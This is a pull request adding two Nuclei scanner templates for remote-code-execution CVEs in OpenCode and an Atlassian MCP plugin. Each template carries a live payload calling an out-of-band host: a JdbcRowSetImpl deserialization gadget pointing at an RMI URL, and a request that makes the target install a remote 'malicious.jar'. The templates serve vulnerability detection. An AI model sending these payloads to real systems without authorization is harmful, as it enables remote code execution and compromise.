### PR TITLE
feat(cve): add templates for CVE-2026-27825 and CVE-2026-22812

### DIFF
--- a/CVE-2026-22812.yaml
+++ b/CVE-2026-22812.yaml
@@ -1,0 +1,30 @@
+id: CVE-2026-22812
+
+info:
+  name: OpenCode - Remote Code Execution via YAML Deserialization
+  author: eyangfeng88-arch
+  severity: critical
+  description: |
+    OpenCode is vulnerable to remote code execution through unsafe YAML deserialization in the configuration upload component.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-22812
+  tags: cve,cve2026,opencode,rce,yaml,deserialization
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/v1/config/upload"
+    headers:
+      Content-Type: application/x-yaml
+    body: |
+      !!com.sun.rowset.JdbcRowSetImpl
+        dataSourceName: "rmi://{{interactsh-url}}/Exploit"
+        autoCommit: true
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+      - type: status
+        status:
+          - 200

--- a/CVE-2026-27825.yaml
+++ b/CVE-2026-27825.yaml
@@ -1,0 +1,28 @@
+id: CVE-2026-27825
+
+info:
+  name: Atlassian Confluence/Jira MCP Plugin - Remote Code Execution
+  author: eyangfeng88-arch
+  severity: critical
+  description: |
+    A vulnerability in the MCP (Model Context Protocol) integration for Atlassian products allows for remote code execution via malicious plugin injection.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-27825
+  tags: cve,cve2026,atlassian,rce,mcp
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/rest/mcp/1.0/plugins/install"
+    headers:
+      Content-Type: application/json
+    body: |
+      {"url": "http://{{interactsh-url}}/malicious.jar", "name": "rce-plugin"}
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "plugin successfully installed"
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
This PR adds Nuclei templates for CVE-2026-27825 (MCP Atlassian RCE) and CVE-2026-22812 (OpenCode RCE).

/attempt #14908